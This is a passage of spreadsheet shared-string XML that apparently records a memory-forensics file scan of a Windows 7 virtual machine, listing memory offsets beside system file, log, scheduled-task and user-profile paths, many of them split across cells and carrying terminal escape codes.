    <t>0xdeffe570</t>
  </si>
  <si>
    <t>\Windows\Globalization\Sorting\SortDefault.nls_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffebf8</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_link.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffed18</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_move.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffef80</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_unavail.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefff038</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_pen.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefff138</t>
  </si>
  <si>
    <t>\Windows\System32\WlS0WndH.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefff5a8</t>
  </si>
  <si>
    <t>0xdf1a4148</t>
  </si>
  <si>
    <t>0xdf1a8148</t>
  </si>
  <si>
    <t>0xdf1af148</t>
  </si>
  <si>
    <t>0xdf1b6148</t>
  </si>
  <si>
    <t>0xdf1bcef0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\ndproxy.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1bd3a8</t>
  </si>
  <si>
    <t>0xdf1bd6d0</t>
  </si>
  <si>
    <t>0xdf1bdaf0</t>
  </si>
  <si>
    <t>0xdf1be038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\26625cb89e7baba8561c8b5d6862</t>
  </si>
  <si>
    <t>56f9\System.C</t>
  </si>
  <si>
    <t>el.Dat</t>
  </si>
  <si>
    <t>aAnnotations.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1be0f0</t>
  </si>
  <si>
    <t>vices.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1be438</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_de-de_da67f5ee291bdcbb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1be5a0</t>
  </si>
  <si>
    <t>0xdf1be658</t>
  </si>
  <si>
    <t>ale.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1be8b0</t>
  </si>
  <si>
    <t>0xdf1bfe90</t>
  </si>
  <si>
    <t>\Windows\System32\vga.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c0c38</t>
  </si>
  <si>
    <t>\Windows\System32\VBoxDisp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c0e60</t>
  </si>
  <si>
    <t>0xdf1c0f40</t>
  </si>
  <si>
    <t>0xdf1c1190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c1310</t>
  </si>
  <si>
    <t>0xdf1c13c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot2\edb.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c1628</t>
  </si>
  <si>
    <t>\Windows\System32\catroot2\edb.chk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c18d8</t>
  </si>
  <si>
    <t>0xdf1c1b78</t>
  </si>
  <si>
    <t>0xdf1c1c30</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-workstationservice_31bf3856ad364e35_6.1.7601.1</t>
  </si>
  <si>
    <t>7514_none_ce4</t>
  </si>
  <si>
    <t>181d93513da</t>
  </si>
  <si>
    <t>7f.man</t>
  </si>
  <si>
    <t>0xdf1c22c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\iastorv.inf_x86_neutral_0bcee2057afcc090\iastorv.</t>
  </si>
  <si>
    <t>0xdf1c23d8</t>
  </si>
  <si>
    <t>\Windows\inf\netsstpt.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c2808</t>
  </si>
  <si>
    <t>0xdf1c2d48</t>
  </si>
  <si>
    <t>\Windows\inf\netrasa.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c2f80</t>
  </si>
  <si>
    <t>\Windows\inf\netpacer.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c3710</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\taskhost.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c3a38</t>
  </si>
  <si>
    <t>\browser_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c3c58</t>
  </si>
  <si>
    <t>0xdf1c3ec8</t>
  </si>
  <si>
    <t>0xdf1c3f80</t>
  </si>
  <si>
    <t>0xdf1c4bc0</t>
  </si>
  <si>
    <t>0xdf1c4c78</t>
  </si>
  <si>
    <t>0xdf1c7450</t>
  </si>
  <si>
    <t>\Windows\System32\msasn1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c7bd8</t>
  </si>
  <si>
    <t>\Windows\System32\psapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c80e8</t>
  </si>
  <si>
    <t>\Windows\System32\devobj.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c8278</t>
  </si>
  <si>
    <t>0xdf1c8460</t>
  </si>
  <si>
    <t>0xdf1c87e0</t>
  </si>
  <si>
    <t>0xdf1c8ae0</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c8eb8</t>
  </si>
  <si>
    <t>\Windows\System32\comdlg32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c8f80</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1c9928</t>
  </si>
  <si>
    <t>0xdf1c9c40</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-Application.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1ca368</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTUBPM.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1ca410</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventLog-System.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1ca548</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventlog-Security.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1cac38</t>
  </si>
  <si>
    <t>0xdf1cb690</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\2c59ecaf-3a27-4640-9f4b-519b05bdd70f_x001B_[0K_x001B_[83G</t>
  </si>
  <si>
    <t>0xdf1cc548</t>
  </si>
  <si>
    <t>0xdf1cc798</t>
  </si>
  <si>
    <t>0xdf1cc918</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1cd348</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced301-6e01-11de-8bed-001e0bcd1824}.TM.blf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf1cdc10</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\parport.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf200510</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-MUI%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2006c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wscui.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2009e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\RdpGroupPolicyExtension.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf200ec0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Diagnosis\Sideload_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2011a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugatherer_0409_046b6321f9ca254f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf201b00</t>
  </si>
  <si>
    <t>0xdf202f18</t>
  </si>
  <si>
    <t>\Windows\System32\wdi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2031a0</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Local\Microsoft\Windows\UsrClass.dat{1c50b8a3-f043-11e7-8918-080027</t>
  </si>
  <si>
    <t>10b8d0}.TMCon</t>
  </si>
  <si>
    <t>tainer00000</t>
  </si>
  <si>
    <t>000000002.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf203580</t>
  </si>
  <si>
    <t>000000001.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2037a8</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf203860</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Local\Microsoft\Windows\UsrClass.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2039d0</t>
  </si>
  <si>
    <t>10b8d0}.TM.bl</t>
  </si>
  <si>
    <t>0xdf2057c8</t>
  </si>
  <si>
    <t>\Device\HarddiskVolume1\Users\sshd_server\AppData\Local\Microsoft\Windows\UsrClass.dat{1c50b8a</t>
  </si>
  <si>
    <t>3-f043-11e7-8</t>
  </si>
  <si>
    <t>918-0800271</t>
  </si>
  <si>
    <t>0b8d0}</t>
  </si>
  <si>
    <t>.TM_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf205d18</t>
  </si>
  <si>
    <t>0xdf207218</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Credentials_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf207938</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Local\Microsoft\Credentials_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf238100</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\odbcint.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2384b8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\ShellCoreInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2386a0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\provsvc.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf238800</t>
  </si>
  <si>
    <t>\Windows\inf\netnb.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2388b8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\en-US\netrass.inf_loc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf238c98</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Spux.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf239288</t>
  </si>
  <si>
    <t>\Windows\System32\nlasvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf239670</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\NetworkProfile.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf239928</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\powercpl.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf239b10</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\NetworkDiagnosticsFramework.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf23a5d8</t>
  </si>
  <si>
    <t>0xdf23a9e0</t>
  </si>
  <si>
    <t>0xdf23aa98</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\group_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2404b0</t>
  </si>
  <si>
    <t>\Windows\System32\wmploc.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf240a48</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\tdtcp.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf240b58</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\rdpwd.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf240da8</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\cimwin32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf241260</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\ETWInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf2414e0</t>
  </si>
  <si>
    <t>\Windows\System32\dhcpcore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf241f80</t>
  </si>
  <si>
    <t>\On-Screen Ke</t>
  </si>
  <si>
    <t>yboard.lnk_x001B_</t>
  </si>
  <si>
    <t>0xdf2425e0</t>
  </si>
  <si>
    <t>\Windows\System32\wmp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf242ae0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Oper</t>
  </si>
  <si>
    <t>ational.evtx_x001B_</t>
  </si>
  <si>
    <t>0xdf242e00</t>
  </si>
  <si>
    <t>0xdf242f80</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admi</t>
  </si>
  <si>
    <t>n.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf4002a0</t>
  </si>
  <si>
    <t>\Windows\System32\invagent.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf400598</t>
  </si>
  <si>
    <t>DrUpdate.dl</t>
  </si>
  <si>
    <t>0xdf400650</t>
  </si>
  <si>
    <t>0xdf400dc0</t>
  </si>
  <si>
    <t>0xdf400e78</t>
  </si>
  <si>
    <t>\Windows\System32\lmhsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf401708</t>
  </si>
  <si>
    <t>\Windows\System32\sxsstore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf401d70</t>
  </si>
  <si>
    <t>\Windows\System32\mpr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf403ae0</t>
  </si>
  <si>
    <t>0xdf403b98</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DeviceUx.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf403f80</t>
  </si>
  <si>
    <t>\Windows\System32\shsvcs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf404730</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-OfflineFiles%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf404c38</t>
  </si>
  <si>
    <t>\Windows\System32\FWPUCLNT.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf404f80</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf405c28</t>
  </si>
  <si>
    <t>\Windows\System32\dhcpcore6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf406180</t>
  </si>
  <si>
    <t>0xdf406888</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodelservice_3.0.0.0_0409_2fd4df9e98bb9bb4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf408140</t>
  </si>
  <si>
    <t>0xdf408348</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-BranchCacheSMB%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf4097b8</t>
  </si>
  <si>
    <t>0xdf40a038</t>
  </si>
  <si>
    <t>\Windows\System32\spp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf40a3f8</t>
  </si>
  <si>
    <t>0xdf40a628</t>
  </si>
  <si>
    <t>0xdf40e300</t>
  </si>
  <si>
    <t>0xdf40f888</t>
  </si>
  <si>
    <t>0xdf415568</t>
  </si>
  <si>
    <t>0xdf436148</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\LogFiles\WdiContextLog.etl.002_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf43ecd8</t>
  </si>
  <si>
    <t>\Windows\System32\Wldap32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf43ed90</t>
  </si>
  <si>
    <t>\Windows\System32\nsi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf440148</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf441460</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\umbus.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf442148</t>
  </si>
  <si>
    <t>0xdf444800</t>
  </si>
  <si>
    <t>0xdf444b98</t>
  </si>
  <si>
    <t>\Windows\System32\normaliz.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf4476b8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\CompositeBus.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf4481f0</t>
  </si>
  <si>
    <t>0xdf449178</t>
  </si>
  <si>
    <t>\Windows\System32\config\SYSTEM.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf449280</t>
  </si>
  <si>
    <t>\Windows\System32\sqmapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf449538</t>
  </si>
  <si>
    <t>0xdf44a4c8</t>
  </si>
  <si>
    <t>0xdf548900</t>
  </si>
  <si>
    <t>0xdf548ac0</t>
  </si>
  <si>
    <t>\Windows\System32\dnsext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf54e690</t>
  </si>
  <si>
    <t>0xdf551ee8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msvfw32.dll.mui_x001B_[0K_x001B_[26G</t>
  </si>
  <si>
    <t>0xdf552f38</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5548f0</t>
  </si>
  <si>
    <t>0xdf554ef0</t>
  </si>
  <si>
    <t>0xdf5561f8</t>
  </si>
  <si>
    <t>\Windows\System32\sppobjs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf556908</t>
  </si>
  <si>
    <t>0xdf556ba0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\WpdCoreInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55a5d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MFC42u.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55ac00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netsh.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55b0b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\VSSVC.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55baa0</t>
  </si>
  <si>
    <t>0xdf55bf80</t>
  </si>
  <si>
    <t>\Windows\inf\netserv.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55d2f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-netbios_31bf3856ad364e35_6.1.7601.24000_none_5</t>
  </si>
  <si>
    <t>c793de8e27ae4</t>
  </si>
  <si>
    <t>41.manifest</t>
  </si>
  <si>
    <t>0xdf55d9d0</t>
  </si>
  <si>
    <t>\Windows\inf\netpacer.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55db18</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-qos_31bf3856ad364e35_6.1.7601.24000_none_b0e2e</t>
  </si>
  <si>
    <t>e4ecf003764.m</t>
  </si>
  <si>
    <t>anifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf55e460</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Config\TxR\{6cced300-6e01-11de-8bed-001e0bcd1824}.TxR_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf560430</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-g..cacheclean-peruvian_31bf3856ad364e35_6.1.7601.24195_n</t>
  </si>
  <si>
    <t>one_bfe0e8286</t>
  </si>
  <si>
    <t>2b6cd97\cle</t>
  </si>
  <si>
    <t>0xdf5607f8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf560f80</t>
  </si>
  <si>
    <t>0xdf561108</t>
  </si>
  <si>
    <t>0xdf561228</t>
  </si>
  <si>
    <t>0xdf561928</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_es-es_da43ed1c296cf1c1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5623d0</t>
  </si>
  <si>
    <t>\Windows\System32\aeinv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf562730</t>
  </si>
  <si>
    <t>0xdf562cc8</t>
  </si>
  <si>
    <t>0xdf563310</t>
  </si>
  <si>
    <t>\Windows\System32\taskcomp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf563870</t>
  </si>
  <si>
    <t>\Windows\Tasks\SCHEDLGU.TXT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf563d28</t>
  </si>
  <si>
    <t>0xdf563f80</t>
  </si>
  <si>
    <t>\Windows\System32\mscoree.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf564428</t>
  </si>
  <si>
    <t>\Windows\Tasks\SA.DAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf564dd0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\taskcomp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5657e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\schedsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf565ec8</t>
  </si>
  <si>
    <t>0xdf566038</t>
  </si>
  <si>
    <t>0xdf566968</t>
  </si>
  <si>
    <t>\atsvc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf566a20</t>
  </si>
  <si>
    <t>0xdf566b90</t>
  </si>
  <si>
    <t>0xdf566c48</t>
  </si>
  <si>
    <t>\Windows\Tasks_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf566db8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\http.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf566f80</t>
  </si>
  <si>
    <t>\Windows\System32\pnrpnsp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf567a78</t>
  </si>
  <si>
    <t>0xdf567d08</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-390-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf568f80</t>
  </si>
  <si>
    <t>0xdf56f500</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\1ec9510d-a439-4950-9399-b6399edf9ea7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf570110</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netmyk01.inf_x86_neutral_a3f8c82b61266bbe\netmyk0</t>
  </si>
  <si>
    <t>0xdf570ad0</t>
  </si>
  <si>
    <t>0xdf571188</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SystemRestore\SR_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5728b8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9334c323-f100-4656-9ba0-e4aa69c0f9c2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf573378</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\9b75c702-ea13-406a-badb-6c588ee4375b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf573cc8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\SystemTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf574c18</t>
  </si>
  <si>
    <t>0xdf575108</t>
  </si>
  <si>
    <t>\Users\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5759d0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\aa0570aa-b257-416a-a6bd-f4f67180ada1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf575b78</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf576038</t>
  </si>
  <si>
    <t>0xdf5766d8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf578778</t>
  </si>
  <si>
    <t>0xdf578da8</t>
  </si>
  <si>
    <t>\Windows\System32\regapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf579850</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_remotepackages_remoteapps_d27fb1f10021e565.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5799e0</t>
  </si>
  <si>
    <t>0xdf57a038</t>
  </si>
  <si>
    <t>0xdf57aaa0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\c90440a0-6d8f-423f-8f42-83eef05ce708_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57be18</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResol</t>
  </si>
  <si>
    <t>ver_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57bf80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e08</t>
  </si>
  <si>
    <t>9\System.Runt</t>
  </si>
  <si>
    <t>ime.Remotin</t>
  </si>
  <si>
    <t>g.dll_x001B_</t>
  </si>
  <si>
    <t>0xdf57c0c8</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57c268</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SideShow\GadgetManager_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57ccc8</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\2f045c85-c6a2-4545-b123-bf444d17e05a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57dc00</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\35c92bbd-a8f9-4cb8-9c21-359a3dbc0c76_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57df80</t>
  </si>
  <si>
    <t>0xdf57e4a0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\367f930a-a3db-4112-b1f1-50e92a171c88_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57e878</t>
  </si>
  <si>
    <t>\Windows\System32\BFE.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57f1e0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Wininet\CacheTask_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57f588</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\528bb585-672b-4e24-8fda-a50537c498e0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57fa68</t>
  </si>
  <si>
    <t>\Windows\System32\umb.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57fb20</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\AppInfoEvents.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf57ff80</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\SideShow\AutoWake_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf5804a0</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Offline Files\Logon Synchronization_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf580820</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\632362c4-e55a-4341-b371-f922ab59c1c1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf581038</t>
  </si>
  <si>
    <t>\Windows\System32\FwRemoteSvr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf581418</t>
  </si>
  <si>
    <t>\Windows\System32\sfc_os.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf581980</t>
  </si>
  <si>
    <t>0xdf581cf0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\6396a30a-424e-45e4-9115-798843fb86fc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf581dd0</t>
  </si>
  <si>
    <t>\Windows\System32\LogFiles\Scm\8905ecd8-016f-4dc2-90e6-a5f1fa6a841a_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf582b00</t>
  </si>
  <si>
    <t>0xdf582c48</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\A</t>
  </si>
  <si>
    <t>D RMS Rights</t>
  </si>
  <si>
